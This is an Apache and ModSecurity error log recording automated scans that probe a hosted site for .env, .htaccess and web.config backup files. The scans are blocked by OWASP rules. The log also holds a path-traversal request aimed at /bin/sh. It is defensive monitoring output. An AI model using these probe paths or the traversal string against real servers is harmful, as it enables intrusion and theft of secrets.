[Mon May 11 11:39:14.064143 2026] [security2:error] [pid 1254328:tid 1254344] [client 185.177.72.9:12054] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/vendor/.env.staging.test"] [unique_id "agGjwkRdw2n9wv6Ai48D3AAAAI0"]
[Mon May 11 11:39:15.992224 2026] [security2:error] [pid 1254328:tid 1254344] [client 185.177.72.9:12054] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjwkRdw2n9wv6Ai48D3AAAAI0"]
[Mon May 11 11:39:19.651826 2026] [ssl:error] [pid 1254133:tid 1254151] (EAI 2)Name or service not known: [client 188.166.17.128:43964] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:39:19.651868 2026] [ssl:error] [pid 1254133:tid 1254151] AH01941: stapling_renew_response: responder error
[Mon May 11 11:39:20.562853 2026] [ssl:error] [pid 1256241:tid 1256247] (EAI 2)Name or service not known: [client 158.46.165.31:36837] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:39:20.562888 2026] [ssl:error] [pid 1256241:tid 1256247] AH01941: stapling_renew_response: responder error
[Mon May 11 11:39:21.053416 2026] [ssl:error] [pid 1254133:tid 1254158] (EAI 2)Name or service not known: [client 193.223.69.64:40603] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:39:21.053459 2026] [ssl:error] [pid 1254133:tid 1254158] AH01941: stapling_renew_response: responder error
[Mon May 11 11:39:22.446476 2026] [ssl:error] [pid 1254179:tid 1254186] (EAI 2)Name or service not known: [client 200.92.171.220:7926] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:39:22.446512 2026] [ssl:error] [pid 1254179:tid 1254186] AH01941: stapling_renew_response: responder error
[Mon May 11 11:39:28.195632 2026] [ssl:error] [pid 1254212:tid 1254225] (EAI 2)Name or service not known: [client 167.99.211.171:60074] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:39:28.195679 2026] [ssl:error] [pid 1254212:tid 1254225] AH01941: stapling_renew_response: responder error
[Mon May 11 11:39:29.834833 2026] [ssl:error] [pid 1256241:tid 1256267] (EAI 2)Name or service not known: [client 94.176.1.234:34561] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:39:29.834876 2026] [ssl:error] [pid 1256241:tid 1256267] AH01941: stapling_renew_response: responder error
[Mon May 11 11:39:30.716000 2026] [ssl:error] [pid 1254212:tid 1254232] (EAI 2)Name or service not known: [client 45.131.162.206:36095] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:39:30.716036 2026] [ssl:error] [pid 1254212:tid 1254232] AH01941: stapling_renew_response: responder error
[Mon May 11 11:39:31.157392 2026] [core:error] [pid 1254133:tid 1254140] [client 82.24.64.32:35806] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Mon May 11 11:39:31.161660 2026] [:error] [pid 1254133:tid 1254140] [client 82.24.64.32:35806] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 11:39:31.719329 2026] [security2:error] [pid 1256241:tid 1256254] [client 185.177.72.9:36860] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /videos/.env.development2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/videos/.env.development2"] [unique_id "agGj05kIEwRJMyDaV55KfQAAAUg"]
[Mon May 11 11:39:31.719683 2026] [security2:error] [pid 1256241:tid 1256254] [client 185.177.72.9:36860] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/videos/.env.development2"] [unique_id "agGj05kIEwRJMyDaV55KfQAAAUg"]
[Mon May 11 11:39:31.985992 2026] [ssl:error] [pid 1254212:tid 1254229] (EAI 2)Name or service not known: [client 69.1.193.129:41289] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:39:31.986029 2026] [ssl:error] [pid 1254212:tid 1254229] AH01941: stapling_renew_response: responder error
[Mon May 11 11:39:32.892926 2026] [security2:error] [pid 1256241:tid 1256254] [client 185.177.72.9:36860] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGj05kIEwRJMyDaV55KfQAAAUg"]
[Mon May 11 11:39:32.920485 2026] [security2:error] [pid 1254242:tid 1254250] [client 185.177.72.9:36868] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /videos/.env.development2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/videos/.env.development2"] [unique_id "agGj1L4KNmD_mZ_vlf80awAAAEQ"]
[Mon May 11 11:39:32.920789 2026] [security2:error] [pid 1254242:tid 1254250] [client 185.177.72.9:36868] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/videos/.env.development2"] [unique_id "agGj1L4KNmD_mZ_vlf80awAAAEQ"]
[Mon May 11 11:39:34.141735 2026] [security2:error] [pid 1254242:tid 1254250] [client 185.177.72.9:36868] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGj1L4KNmD_mZ_vlf80awAAAEQ"]
[Mon May 11 11:39:34.167853 2026] [security2:error] [pid 1254133:tid 1254156] [client 185.177.72.9:56850] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htaccess found within REQUEST_FILENAME: /videos/.htaccess_backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/videos/.htaccess_backup"] [unique_id "agGj1hjZymfuKpjWXeh4xAAAANQ"]
[Mon May 11 11:39:34.168208 2026] [security2:error] [pid 1254133:tid 1254156] [client 185.177.72.9:56850] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/videos/.htaccess_backup"] [unique_id "agGj1hjZymfuKpjWXeh4xAAAANQ"]
[Mon May 11 11:39:35.739462 2026] [security2:error] [pid 1254133:tid 1254156] [client 185.177.72.9:56850] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGj1hjZymfuKpjWXeh4xAAAANQ"]
[Mon May 11 11:39:35.767684 2026] [security2:error] [pid 1254133:tid 1254160] [client 185.177.72.9:56862] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htaccess found within REQUEST_FILENAME: /videos/.htaccess_backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/videos/.htaccess_backup"] [unique_id "agGj1xjZymfuKpjWXeh4xQAAANg"]
[Mon May 11 11:39:35.767915 2026] [security2:error] [pid 1254133:tid 1254160] [client 185.177.72.9:56862] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/videos/.htaccess_backup"] [unique_id "agGj1xjZymfuKpjWXeh4xQAAANg"]
[Mon May 11 11:39:36.981325 2026] [security2:error] [pid 1254133:tid 1254160] [client 185.177.72.9:56862] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGj1xjZymfuKpjWXeh4xQAAANg"]
[Mon May 11 11:39:39.761369 2026] [security2:error] [pid 1254212:tid 1254223] [client 185.177.72.9:56880] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /views/.env.test_temp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/views/.env.test_temp"] [unique_id "agGj20YQeUtAPynIs6xUQgAAAAk"]
[Mon May 11 11:39:39.761691 2026] [security2:error] [pid 1254212:tid 1254223] [client 185.177.72.9:56880] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/views/.env.test_temp"] [unique_id "agGj20YQeUtAPynIs6xUQgAAAAk"]
[Mon May 11 11:39:41.170234 2026] [security2:error] [pid 1254212:tid 1254223] [client 185.177.72.9:56880] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGj20YQeUtAPynIs6xUQgAAAAk"]
[Mon May 11 11:39:41.194902 2026] [security2:error] [pid 1254242:tid 1254269] [client 185.177.72.9:56882] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /views/.env.test_temp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/views/.env.test_temp"] [unique_id "agGj3b4KNmD_mZ_vlf80cAAAAFg"]
[Mon May 11 11:39:41.195114 2026] [security2:error] [pid 1254242:tid 1254269] [client 185.177.72.9:56882] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/views/.env.test_temp"] [unique_id "agGj3b4KNmD_mZ_vlf80cAAAAFg"]
[Mon May 11 11:39:42.424682 2026] [security2:error] [pid 1254242:tid 1254269] [client 185.177.72.9:56882] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGj3b4KNmD_mZ_vlf80cAAAAFg"]
[Mon May 11 11:40:06.868064 2026] [security2:error] [pid 1254133:tid 1254156] [client 185.177.72.9:9724] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vue/.env.development.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/vue/.env.development.old"] [unique_id "agGj9hjZymfuKpjWXeh43QAAANQ"]
[Mon May 11 11:40:06.869056 2026] [security2:error] [pid 1254133:tid 1254156] [client 185.177.72.9:9724] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/vue/.env.development.old"] [unique_id "agGj9hjZymfuKpjWXeh43QAAANQ"]
[Mon May 11 11:40:08.436127 2026] [security2:error] [pid 1254133:tid 1254156] [client 185.177.72.9:9724] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGj9hjZymfuKpjWXeh43QAAANQ"]
[Mon May 11 11:40:08.463839 2026] [security2:error] [pid 1254242:tid 1254269] [client 185.177.72.9:9734] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vue/.env.development.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/vue/.env.development.old"] [unique_id "agGj-L4KNmD_mZ_vlf80iAAAAFg"]
[Mon May 11 11:40:08.464239 2026] [security2:error] [pid 1254242:tid 1254269] [client 185.177.72.9:9734] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/vue/.env.development.old"] [unique_id "agGj-L4KNmD_mZ_vlf80iAAAAFg"]
[Mon May 11 11:40:09.703425 2026] [security2:error] [pid 1254242:tid 1254269] [client 185.177.72.9:9734] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGj-L4KNmD_mZ_vlf80iAAAAFg"]
[Mon May 11 11:40:14.386872 2026] [security2:error] [pid 1254328:tid 1254350] [client 43.134.51.171:41360] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "castiglionecorporatefinance.com"] [uri "/"] [unique_id "agGj_kRdw2n9wv6Ai48EDQAAAJQ"]
[Mon May 11 11:40:14.653250 2026] [security2:error] [pid 1254242:tid 1254261] [client 185.177.72.9:64148] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/web.config.bak"] [unique_id "agGj_r4KNmD_mZ_vlf80iwAAAFA"]
[Mon May 11 11:40:14.653564 2026] [security2:error] [pid 1254242:tid 1254261] [client 185.177.72.9:64148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/web.config.bak"] [unique_id "agGj_r4KNmD_mZ_vlf80iwAAAFA"]
[Mon May 11 11:40:15.832246 2026] [security2:error] [pid 1254242:tid 1254261] [client 185.177.72.9:64148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGj_r4KNmD_mZ_vlf80iwAAAFA"]
[Mon May 11 11:40:15.860931 2026] [security2:error] [pid 1254328:tid 1254335] [client 185.177.72.9:64152] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/web.config.bak"] [unique_id "agGj_0Rdw2n9wv6Ai48EDgAAAIQ"]
[Mon May 11 11:40:15.861395 2026] [security2:error] [pid 1254328:tid 1254335] [client 185.177.72.9:64152] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/web.config.bak"] [unique_id "agGj_0Rdw2n9wv6Ai48EDgAAAIQ"]
[Mon May 11 11:40:17.992201 2026] [security2:error] [pid 1254328:tid 1254335] [client 185.177.72.9:64152] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGj_0Rdw2n9wv6Ai48EDgAAAIQ"]
[Mon May 11 11:40:18.024654 2026] [security2:error] [pid 1256241:tid 1256247] [client 185.177.72.9:64154] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config5"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/web.config5"] [unique_id "agGkApkIEwRJMyDaV55KtAAAAUE"]
[Mon May 11 11:40:18.024955 2026] [security2:error] [pid 1256241:tid 1256247] [client 185.177.72.9:64154] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/web.config5"] [unique_id "agGkApkIEwRJMyDaV55KtAAAAUE"]
